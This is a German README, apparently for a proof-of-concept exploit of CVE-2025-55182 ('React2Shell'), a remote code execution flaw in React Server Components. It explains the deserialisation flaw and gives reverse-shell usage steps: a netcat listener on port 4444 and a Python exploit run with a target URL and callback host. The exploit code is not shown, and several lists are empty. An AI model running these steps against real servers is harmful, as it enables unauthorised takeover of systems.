
Proof-of-concept-Exploit für CVE-2025-55182 (React2Shell), eine nicht authentifizierte Remote-Codeausführungs-Sicherheitslücke in React Server Components durch manipulierte Flight-Protokoll-Payloads.
CVE-2025-55182, auch bekannt als React2Shell, ist eine kritische unauthentifizierte Remote Code Execution (RCE)-Schwachstelle, die React Server Components-Pakete betrifft (Versionen 19.0, 19.1.0, 19.1.1 und 19.2.0).
Diese Schwachstelle könnte Angreifern ermöglichen, auf anfälligen Servern eine beliebige Codeausführung zu erreichen, und zwar über eine einzelne präparierte HTTP-Anfrage, ohne dass eine Authentifizierung erforderlich ist.
React Server Components verwenden das Flight-Protokoll, um zwischen Client und Server ausgetauschte Komponentendaten zu serialisieren und zu deserialisieren.
Eine unzureichende Validierung während dieses Deserialisierungsprozesses könnte es speziell präparierten Payloads ermöglichen, interne Objektstrukturen zu manipulieren und gefährliche JavaScript-Ausführungsprimitive zu erreichen.
Die Schwachstelle hat ihren Ursprung in unzureichender Validierung während der Deserialisierung von React Server Components (RSC) Flight-Protocol-Payloads.
Speziell präparierte Payloads können:
multipart/form-data-AnfrageStarten Sie einen Listener auf Ihrem Rechner:
nc -lvnp 4444
Führen Sie den Exploit aus:
python3 CVE-2025-55182-React2Shell.py <TARGET_URL> <LHOST>
python3 CVE-2025-55182-React2Shell.py http://192.168.56.101:3000/ 192.168.56.100
Um diese Schwachstelle zu entschärfen:
Dieses Projekt wird ausschließlich bereitgestellt für:
Die Autoren übernehmen keine Verantwortung für Missbrauch oder Schäden, die durch dieses Material verursacht werden. Die Nutzer sind allein dafür verantwortlich, alle geltenden Gesetze und Vorschriften einzuhalten.